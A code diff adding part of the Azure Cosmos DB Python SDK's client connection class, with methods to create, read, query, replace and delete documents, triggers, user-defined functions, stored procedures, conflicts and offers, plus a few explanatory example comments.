The new User.
+ :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(user) + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return self.Replace(user, path, "users", user_id, None, options, **kwargs) + + def DeleteUser(self, user_link, options=None, **kwargs): + """Deletes a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The deleted User. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return self.DeleteResource(path, "users", user_id, None, options, **kwargs) + + def ReplacePermission(self, permission_link, permission, options=None, **kwargs): + """Replaces a permission and returns it. + + :param str permission_link: + The link to the permission. + :param dict permission: + :param dict options: + The request options for the request. + + :return: + The new Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return self.Replace(permission, path, "permissions", permission_id, None, options, **kwargs) + + def DeletePermission(self, permission_link, options=None, **kwargs): + """Deletes a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The deleted Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return self.DeleteResource(path, "permissions", permission_id, None, options, **kwargs) + + def ReadItems(self, collection_link, feed_options=None, response_hook=None, **kwargs): + """Reads all documents in a collection. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self.QueryItems(collection_link, None, feed_options, response_hook=response_hook, **kwargs) + + def QueryItems( + self, + database_or_container_link, + query, + options=None, + partition_key=None, + response_hook=None, + **kwargs + ): + """Queries documents in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key: + Partition key for the query (default value None) + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents.
+ :rtype: + query_iterable.QueryIterable + + """ + database_or_container_link = base.TrimBeginningAndEndingSlashes(database_or_container_link) + + if options is None: + options = {} + + if base.IsDatabaseLink(database_or_container_link): + return ItemPaged( + self, + query, + options, + database_link=database_or_container_link, + partition_key=partition_key, + page_iterator_class=query_iterable.QueryIterable + ) + + path = base.GetPathFromLink(database_or_container_link, "docs") + collection_id = base.GetResourceIdOrFullNameFromLink(database_or_container_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, + "docs", + collection_id, + lambda r: r["Documents"], + lambda _, b: b, + query, + options, + response_hook=response_hook, + **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, + query, + options, + fetch_function=fetch_fn, + collection_link=database_or_container_link, + page_iterator_class=query_iterable.QueryIterable + ) + + def QueryItemsChangeFeed(self, collection_link, options=None, response_hook=None, **kwargs): + """Queries the change feed of documents in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + options may also specify partition key range id. + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + + partition_key_range_id = None + if options is not None and "partitionKeyRangeId" in options: + partition_key_range_id = options["partitionKeyRangeId"] + + return self._QueryChangeFeed( + collection_link, "Documents", options, partition_key_range_id, response_hook=response_hook, **kwargs + ) + + def _QueryChangeFeed( + self, collection_link, resource_type, options=None, partition_key_range_id=None, response_hook=None, + **kwargs + ): + """Queries the change feed of a resource in a collection. + + :param str collection_link: + The link to the document collection. + :param str resource_type: + The type of the resource. + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Specifies partition key range id. + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + options["changeFeed"] = True + + resource_key_map = {"Documents": "docs"} + + # For now, change feed only supports the Documents and Partition Key Range resource types + if resource_type not in resource_key_map: + raise NotImplementedError(resource_type + " change feed query is not supported.") + + resource_key = resource_key_map[resource_type] + path = base.GetPathFromLink(collection_link, resource_key) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, + resource_key, + collection_id, + lambda r: r[resource_type], + lambda _, b: b, + None, + options, + partition_key_range_id, + response_hook=response_hook, + **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, + None, + options, + fetch_function=fetch_fn, + collection_link=collection_link, + page_iterator_class=query_iterable.QueryIterable + ) + + def _ReadPartitionKeyRanges(self, collection_link, feed_options=None, **kwargs): + """Reads Partition Key Ranges. + + :param str collection_link: + The link to the document collection.
+ def _ReadPartitionKeyRanges(self, collection_link, feed_options=None, **kwargs):
+ """Reads Partition Key Ranges.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict feed_options:
+
+ :return:
+ Query Iterable of PartitionKeyRanges.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if feed_options is None:
+ feed_options = {}
+
+ return self._QueryPartitionKeyRanges(collection_link, None, feed_options, **kwargs)
+
+ def _QueryPartitionKeyRanges(self, collection_link, query, options=None, **kwargs):
+ """Queries Partition Key Ranges in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ Query Iterable of PartitionKeyRanges.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(collection_link, "pkranges")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+ def fetch_fn(options):
+ return (
+ self.__QueryFeed(
+ path, "pkranges", collection_id, lambda r: r["PartitionKeyRanges"],
+ lambda _, b: b, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return ItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def CreateItem(self, database_or_container_link, document, options=None, **kwargs):
+ """Creates a document in a collection.
+
+ :param str database_or_container_link:
+ The link to the database when using partitioning, otherwise link to the document collection.
+ :param dict document:
+ The Azure Cosmos document to create.
+ :param dict options:
+ The request options for the request.
+ :param bool options['disableAutomaticIdGeneration']:
+ Disables the automatic id generation. If id is missing in the body and this
+ option is true, an error will be returned.
+
+ :return:
+ The created Document.
+ :rtype:
+ dict
+
+ """
+ # Python's default arguments are evaluated once when the function is defined,
+ # not each time the function is called (like it is in say, Ruby). This means
+ # that if you use a mutable default argument and mutate it, you will have
+ # mutated that object for all future calls to the function as well. So we use
+ # a non-mutable default in this case (None) and assign an empty dict (mutable)
+ # inside the method. For more details on this gotcha, please refer to
+ # http://docs.python-guide.org/en/latest/writing/gotchas/
+ if options is None:
+ options = {}
+
+ # We check the link to be document collection link since it can be database
+ # link in case of client side partitioning
+ collection_id, document, path = self._GetContainerIdWithPathForItem(
+ database_or_container_link, document, options
+ )
+
+ if base.IsItemContainerLink(database_or_container_link):
+ options = self._AddPartitionKey(database_or_container_link, document, options)
+
+ return self.Create(document, path, "docs", collection_id, None, options, **kwargs)
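+ # The comment in CreateItem above describes Python's mutable-default-argument
+ # gotcha; a minimal standalone demonstration of why `options=None` is used
+ # instead of `options={}` (illustrative snippet, not part of the SDK):
+ #
+ #     def bad(options={}):            # one dict shared across ALL calls
+ #         options["n"] = options.get("n", 0) + 1
+ #         return options["n"]
+ #
+ #     def good(options=None):         # fresh dict per call, as done here
+ #         if options is None:
+ #             options = {}
+ #         options["n"] = options.get("n", 0) + 1
+ #         return options["n"]
+ #
+ #     assert bad() == 1 and bad() == 2      # state leaks between calls
+ #     assert good() == 1 and good() == 1    # no leak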
+ def UpsertItem(self, database_or_container_link, document, options=None, **kwargs):
+ """Upserts a document in a collection.
+
+ :param str database_or_container_link:
+ The link to the database when using partitioning, otherwise link to the document collection.
+ :param dict document:
+ The Azure Cosmos document to upsert.
+ :param dict options:
+ The request options for the request.
+ :param bool options['disableAutomaticIdGeneration']:
+ Disables the automatic id generation. If id is missing in the body and this
+ option is true, an error will be returned.
+
+ :return:
+ The upserted Document.
+ :rtype:
+ dict
+
+ """
+ # Python's default arguments are evaluated once when the function is defined,
+ # not each time the function is called (like it is in say, Ruby). This means
+ # that if you use a mutable default argument and mutate it, you will have
+ # mutated that object for all future calls to the function as well. So we use
+ # a non-mutable default in this case (None) and assign an empty dict (mutable)
+ # inside the method. For more details on this gotcha, please refer to
+ # http://docs.python-guide.org/en/latest/writing/gotchas/
+ if options is None:
+ options = {}
+
+ # We check the link to be document collection link since it can be database
+ # link in case of client side partitioning
+ if base.IsItemContainerLink(database_or_container_link):
+ options = self._AddPartitionKey(database_or_container_link, document, options)
+
+ collection_id, document, path = self._GetContainerIdWithPathForItem(
+ database_or_container_link, document, options
+ )
+ return self.Upsert(document, path, "docs", collection_id, None, options, **kwargs)
+
+ PartitionResolverErrorMessage = (
+ "Couldn't find any partition resolvers for the database link provided. "
+ + "Ensure that the link you used when registering the partition resolvers "
+ + "matches the link provided or you need to register both types of database "
+ + "link (self link as well as ID based link)."
+ )
+
+ # Gets the collection id and path for the document
+ def _GetContainerIdWithPathForItem(self, database_or_container_link, document, options):
+
+ if not database_or_container_link:
+ raise ValueError("database_or_container_link is None or empty.")
+
+ if document is None:
+ raise ValueError("document is None.")
+
+ CosmosClientConnection.__ValidateResource(document)
+ document = document.copy()
+ if not document.get("id") and not options.get("disableAutomaticIdGeneration"):
+ document["id"] = base.GenerateGuidId()
+
+ collection_link = database_or_container_link
+
+ if base.IsDatabaseLink(database_or_container_link):
+ partition_resolver = self.GetPartitionResolver(database_or_container_link)
+
+ if partition_resolver is not None:
+ collection_link = partition_resolver.ResolveForCreate(document)
+ else:
+ raise ValueError(CosmosClientConnection.PartitionResolverErrorMessage)
+
+ path = base.GetPathFromLink(collection_link, "docs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return collection_id, document, path
+
+ def ReadItem(self, document_link, options=None, **kwargs):
+ """Reads a document.
+
+ :param str document_link:
+ The link to the document.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Document.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(document_link)
+ document_id = base.GetResourceIdOrFullNameFromLink(document_link)
+ return self.Read(path, "docs", document_id, None, options, **kwargs)
+
+ def ReadTriggers(self, collection_link, options=None, **kwargs):
+ """Reads all triggers in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ Query Iterable of Triggers.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ return self.QueryTriggers(collection_link, None, options, **kwargs)
+
+ def QueryTriggers(self, collection_link, query, options=None, **kwargs):
+ """Queries triggers in a collection.
+ + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "triggers", collection_id, lambda r: r["Triggers"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateTrigger(self, collection_link, trigger, options=None, **kwargs): + """Creates a trigger in a collection. + + :param str collection_link: + The link to the document collection. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The created Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, trigger = self._GetContainerIdWithPathForTrigger(collection_link, trigger) + return self.Create(trigger, path, "triggers", collection_id, None, options, **kwargs) + + def UpsertTrigger(self, collection_link, trigger, options=None, **kwargs): + """Upserts a trigger in a collection. + + :param str collection_link: + The link to the document collection. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The upserted Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + collection_id, path, trigger = self._GetContainerIdWithPathForTrigger(collection_link, trigger) + return self.Upsert(trigger, path, "triggers", collection_id, None, options, **kwargs) + + def _GetContainerIdWithPathForTrigger(self, collection_link, trigger): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(trigger) + trigger = trigger.copy() + if trigger.get("serverScript"): + trigger["body"] = str(trigger.pop("serverScript", "")) + elif trigger.get("body"): + trigger["body"] = str(trigger["body"]) + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, path, trigger + + def ReadTrigger(self, trigger_link, options=None, **kwargs): + """Reads a trigger. + + :param str trigger_link: + The link to the trigger. + :param dict options: + The request options for the request. + + :return: + The read Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return self.Read(path, "triggers", trigger_id, None, options, **kwargs) + + def ReadUserDefinedFunctions(self, collection_link, options=None, **kwargs): + """Reads all user-defined functions in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUserDefinedFunctions(collection_link, None, options, **kwargs) + + def QueryUserDefinedFunctions(self, collection_link, query, options=None, **kwargs): + """Queries user-defined functions in a collection. + + :param str collection_link: + The link to the collection. 
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ Query Iterable of UDFs.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(collection_link, "udfs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+ def fetch_fn(options):
+ return (
+ self.__QueryFeed(
+ path, "udfs", collection_id, lambda r: r["UserDefinedFunctions"],
+ lambda _, b: b, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return ItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def CreateUserDefinedFunction(self, collection_link, udf, options=None, **kwargs):
+ """Creates a user-defined function in a collection.
+
+ :param str collection_link:
+ The link to the collection.
+ :param dict udf:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The created UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ collection_id, path, udf = self._GetContainerIdWithPathForUDF(collection_link, udf)
+ return self.Create(udf, path, "udfs", collection_id, None, options, **kwargs)
+
+ def UpsertUserDefinedFunction(self, collection_link, udf, options=None, **kwargs):
+ """Upserts a user-defined function in a collection.
+
+ :param str collection_link:
+ The link to the collection.
+ :param dict udf:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The upserted UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ collection_id, path, udf = self._GetContainerIdWithPathForUDF(collection_link, udf)
+ return self.Upsert(udf, path, "udfs", collection_id, None, options, **kwargs)
+
+ def _GetContainerIdWithPathForUDF(self, collection_link, udf): # pylint: disable=no-self-use
+ CosmosClientConnection.__ValidateResource(udf)
+ udf = udf.copy()
+ if udf.get("serverScript"):
+ udf["body"] = str(udf.pop("serverScript", ""))
+ elif udf.get("body"):
+ udf["body"] = str(udf["body"])
+
+ path = base.GetPathFromLink(collection_link, "udfs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return collection_id, path, udf
+
+ def ReadUserDefinedFunction(self, udf_link, options=None, **kwargs):
+ """Reads a user-defined function.
+
+ :param str udf_link:
+ The link to the user-defined function.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(udf_link)
+ udf_id = base.GetResourceIdOrFullNameFromLink(udf_link)
+ return self.Read(path, "udfs", udf_id, None, options, **kwargs)
+
+ def ReadStoredProcedures(self, collection_link, options=None, **kwargs):
+ """Reads all stored procedures in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ Query Iterable of Stored Procedures.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ return self.QueryStoredProcedures(collection_link, None, options, **kwargs)
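+ # The _GetContainerIdWithPathFor{Trigger,UDF,Sproc} helpers all accept the
+ # script either under "serverScript" or "body" and normalize it to a string
+ # "body" before the request is issued. Illustrative input/output (resource
+ # dict is an example, not SDK data):
+ #
+ #     udf = {"id": "tax", "serverScript": "function(x){ return x * 1.2; }"}
+ #     # after normalization:
+ #     # {"id": "tax", "body": "function(x){ return x * 1.2; }"}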
+ def QueryStoredProcedures(self, collection_link, query, options=None, **kwargs):
+ """Queries stored procedures in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ Query Iterable of Stored Procedures.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(collection_link, "sprocs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+ def fetch_fn(options):
+ return (
+ self.__QueryFeed(
+ path, "sprocs", collection_id, lambda r: r["StoredProcedures"],
+ lambda _, b: b, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return ItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def CreateStoredProcedure(self, collection_link, sproc, options=None, **kwargs):
+ """Creates a stored procedure in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict sproc:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The created Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ collection_id, path, sproc = self._GetContainerIdWithPathForSproc(collection_link, sproc)
+ return self.Create(sproc, path, "sprocs", collection_id, None, options, **kwargs)
+
+ def UpsertStoredProcedure(self, collection_link, sproc, options=None, **kwargs):
+ """Upserts a stored procedure in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict sproc:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The upserted Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ collection_id, path, sproc = self._GetContainerIdWithPathForSproc(collection_link, sproc)
+ return self.Upsert(sproc, path, "sprocs", collection_id, None, options, **kwargs)
+
+ def _GetContainerIdWithPathForSproc(self, collection_link, sproc): # pylint: disable=no-self-use
+ CosmosClientConnection.__ValidateResource(sproc)
+ sproc = sproc.copy()
+ if sproc.get("serverScript"):
+ sproc["body"] = str(sproc.pop("serverScript", ""))
+ elif sproc.get("body"):
+ sproc["body"] = str(sproc["body"])
+ path = base.GetPathFromLink(collection_link, "sprocs")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return collection_id, path, sproc
+
+ def ReadStoredProcedure(self, sproc_link, options=None, **kwargs):
+ """Reads a stored procedure.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ return self.Read(path, "sprocs", sproc_id, None, options, **kwargs)
+
+ def ReadConflicts(self, collection_link, feed_options=None, **kwargs):
+ """Reads conflicts.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict feed_options:
+
+ :return:
+ Query Iterable of Conflicts.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if feed_options is None:
+ feed_options = {}
+
+ return self.QueryConflicts(collection_link, None, feed_options, **kwargs)
+
+ def QueryConflicts(self, collection_link, query, options=None, **kwargs):
+ """Queries conflicts in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ Query Iterable of Conflicts.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(collection_link, "conflicts")
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+ def fetch_fn(options):
+ return (
+ self.__QueryFeed(
+ path, "conflicts", collection_id, lambda r: r["Conflicts"],
+ lambda _, b: b, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return ItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def ReadConflict(self, conflict_link, options=None, **kwargs):
+ """Reads a conflict.
+
+ :param str conflict_link:
+ The link to the conflict.
+ :param dict options:
+
+ :return:
+ The read Conflict.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(conflict_link)
+ conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link)
+ return self.Read(path, "conflicts", conflict_id, None, options, **kwargs)
+
+ def DeleteContainer(self, collection_link, options=None, **kwargs):
+ """Deletes a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Collection.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(collection_link)
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return self.DeleteResource(path, "colls", collection_id, None, options, **kwargs)
+
+ def ReplaceItem(self, document_link, new_document, options=None, **kwargs):
+ """Replaces a document and returns it.
+
+ :param str document_link:
+ The link to the document.
+ :param dict new_document:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new Document.
+ :rtype:
+ dict
+
+ """
+ CosmosClientConnection.__ValidateResource(new_document)
+ path = base.GetPathFromLink(document_link)
+ document_id = base.GetResourceIdOrFullNameFromLink(document_link)
+
+ # Python's default arguments are evaluated once when the function is defined,
+ # not each time the function is called (like it is in say, Ruby). This means
+ # that if you use a mutable default argument and mutate it, you will have
+ # mutated that object for all future calls to the function as well. So we use
+ # a non-mutable default in this case (None) and assign an empty dict (mutable)
+ # inside the function so that it remains local. For more details on this gotcha,
+ # please refer to http://docs.python-guide.org/en/latest/writing/gotchas/
+ if options is None:
+ options = {}
+
+ # Extract the document collection link and add the partition key to options
+ collection_link = base.GetItemContainerLink(document_link)
+ options = self._AddPartitionKey(collection_link, new_document, options)
+
+ return self.Replace(new_document, path, "docs", document_id, None, options, **kwargs)
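+ # Example (hypothetical call; `connection` and the links are illustrative).
+ # ReplaceItem above derives the container link from the document link and
+ # fills options["partitionKey"] from the new body via _AddPartitionKey
+ # before the PUT is sent:
+ #
+ #     new_doc = {"id": "order-1", "customer": "alice", "total": 42}
+ #     replaced = connection.ReplaceItem(
+ #         "dbs/mydb/colls/orders/docs/order-1", new_doc)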
+ def DeleteItem(self, document_link, options=None, **kwargs):
+ """Deletes a document.
+
+ :param str document_link:
+ The link to the document.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Document.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(document_link)
+ document_id = base.GetResourceIdOrFullNameFromLink(document_link)
+ return self.DeleteResource(path, "docs", document_id, None, options, **kwargs)
+
+ def ReplaceTrigger(self, trigger_link, trigger, options=None, **kwargs):
+ """Replaces a trigger and returns it.
+
+ :param str trigger_link:
+ The link to the trigger.
+ :param dict trigger:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The replaced Trigger.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(trigger)
+ trigger = trigger.copy()
+ if trigger.get("serverScript"):
+ trigger["body"] = str(trigger.pop("serverScript", ""))
+ elif trigger.get("body"):
+ trigger["body"] = str(trigger["body"])
+
+ path = base.GetPathFromLink(trigger_link)
+ trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link)
+ return self.Replace(trigger, path, "triggers", trigger_id, None, options, **kwargs)
+
+ def DeleteTrigger(self, trigger_link, options=None, **kwargs):
+ """Deletes a trigger.
+
+ :param str trigger_link:
+ The link to the trigger.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Trigger.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(trigger_link)
+ trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link)
+ return self.DeleteResource(path, "triggers", trigger_id, None, options, **kwargs)
+
+ def ReplaceUserDefinedFunction(self, udf_link, udf, options=None, **kwargs):
+ """Replaces a user-defined function and returns it.
+
+ :param str udf_link:
+ The link to the user-defined function.
+ :param dict udf:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(udf)
+ udf = udf.copy()
+ if udf.get("serverScript"):
+ udf["body"] = str(udf.pop("serverScript", ""))
+ elif udf.get("body"):
+ udf["body"] = str(udf["body"])
+
+ path = base.GetPathFromLink(udf_link)
+ udf_id = base.GetResourceIdOrFullNameFromLink(udf_link)
+ return self.Replace(udf, path, "udfs", udf_id, None, options, **kwargs)
+
+ def DeleteUserDefinedFunction(self, udf_link, options=None, **kwargs):
+ """Deletes a user-defined function.
+
+ :param str udf_link:
+ The link to the user-defined function.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(udf_link)
+ udf_id = base.GetResourceIdOrFullNameFromLink(udf_link)
+ return self.DeleteResource(path, "udfs", udf_id, None, options, **kwargs)
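+ # Example (hypothetical call; `connection` and the sproc link are
+ # illustrative). In ExecuteStoredProcedure below, a bare non-list `params`
+ # value is wrapped into a single-element list before being POSTed to the
+ # write endpoint:
+ #
+ #     result = connection.ExecuteStoredProcedure(
+ #         "dbs/mydb/colls/orders/sprocs/bulkImport",
+ #         {"docs": [{"id": "a"}, {"id": "b"}]},     # sent as [ {...} ]
+ #         options={"partitionKey": "alice"})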
+ def ExecuteStoredProcedure(self, sproc_link, params, options=None, **kwargs):
+ """Executes a stored procedure.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param params:
+ The parameters for the stored procedure: a list, a single value
+ (which will be wrapped in a list), or None.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The Stored Procedure response.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = dict(self.default_headers)
+ initial_headers.update({http_constants.HttpHeaders.Accept: (runtime_constants.MediaTypes.Json)})
+
+ if params and not isinstance(params, list):
+ params = [params]
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ headers = base.GetHeaders(self, initial_headers, "post", path, sproc_id, "sprocs", options)
+
+ # ExecuteStoredProcedure will use WriteEndpoint since it uses POST operation
+ request_params = _request_object.RequestObject("sprocs", documents._OperationType.ExecuteJavaScript)
+ result, self.last_response_headers = self.__Post(path, request_params, params, headers, **kwargs)
+ return result
+
+ def ReplaceStoredProcedure(self, sproc_link, sproc, options=None, **kwargs):
+ """Replaces a stored procedure and returns it.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param dict sproc:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The replaced Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(sproc)
+ sproc = sproc.copy()
+ if sproc.get("serverScript"):
+ sproc["body"] = str(sproc.pop("serverScript", ""))
+ elif sproc.get("body"):
+ sproc["body"] = str(sproc["body"])
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ return self.Replace(sproc, path, "sprocs", sproc_id, None, options, **kwargs)
+
+ def DeleteStoredProcedure(self, sproc_link, options=None, **kwargs):
+ """Deletes a stored procedure.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ return self.DeleteResource(path, "sprocs", sproc_id, None, options, **kwargs)
+
+ def DeleteConflict(self, conflict_link, options=None, **kwargs):
+ """Deletes a conflict.
+
+ :param str conflict_link:
+ The link to the conflict.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Conflict.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(conflict_link)
+ conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link)
+ return self.DeleteResource(path, "conflicts", conflict_id, None, options, **kwargs)
+
+ def ReplaceOffer(self, offer_link, offer, **kwargs):
+ """Replaces an offer and returns it.
+
+ :param str offer_link:
+ The link to the offer.
+ :param dict offer:
+
+ :return:
+ The replaced Offer.
+ :rtype:
+ dict
+
+ """
+ CosmosClientConnection.__ValidateResource(offer)
+ path = base.GetPathFromLink(offer_link)
+ offer_id = base.GetResourceIdOrFullNameFromLink(offer_link)
+ return self.Replace(offer, path, "offers", offer_id, None, None, **kwargs)
+
+ def ReadOffer(self, offer_link, **kwargs):
+ """Reads an offer.
+
+ :param str offer_link:
+ The link to the offer.
+
+ :return:
